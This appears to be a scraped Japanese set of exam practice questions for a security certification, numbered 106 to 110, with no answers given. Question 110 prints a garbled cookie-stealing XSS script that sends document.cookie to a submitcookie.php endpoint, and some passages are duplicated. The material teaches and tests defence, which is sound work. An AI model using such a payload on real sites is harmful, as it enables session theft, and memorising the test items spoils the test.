312-85 試験問題 106
コンピューター システムへのアクセスにトークンと 4 桁の個人識別番号 (PIN) が使用され、トークンが正しい PIN をオフラインでチェックする場合、どのような種類の攻撃が可能ですか?
312-85 試験問題 107
SQL インジェクション (SQLi) 攻撃は、SQL 構文を Web リクエストに挿入しようとします。これにより、認証がバイパスされ、攻撃者が Web アプリケーションに添付されたデータにアクセスしたり、データを変更したりできる可能性があります。
次の SQLI タイプのうち、データベース サーバーの DNS リクエストを作成してデータを攻撃者に渡す機能を活用しているのはどれですか?
次の SQLI タイプのうち、データベース サーバーの DNS リクエストを作成してデータを攻撃者に渡す機能を活用しているのはどれですか?
312-85 試験問題 108
ネットワーク侵入防止と侵入検出を実行し、ネットワーク スニファーとして機能し、ネットワーク アクティビティを記録できるツールが必要です。どのツールを選択する可能性が最も高いでしょうか?
312-85 試験問題 109
プロのハッカーであるモリスは、ネットワーク上のトラフィックを傍受し、アクティブなシステム、ネットワーク サービス、アプリケーション、および脆弱性を特定することにより、ターゲット組織の脆弱性スキャンを実行しました。彼はまた、現在ネットワークにアクセスしているユーザーのリストも入手しました。Morris が対象組織に対して実行した脆弱性評価の種類は何ですか?
312-85 試験問題 110
ある日、ジュディはフォーラムを作成しました。彼女は、あるユーザーがコメントを書かずに奇妙な画像を投稿していることに気づきました。
彼女はすぐにセキュリティの専門家に電話しました。その専門家は、これらの画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+escape(document.cookie)+ " />); </script> 画像をクリックしたユーザーにどのような問題が発生しましたか?
彼女はすぐにセキュリティの専門家に電話しました。その専門家は、これらの画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+escape(document.cookie)+ " />); </script> 画像をクリックしたユーザーにどのような問題が発生しましたか?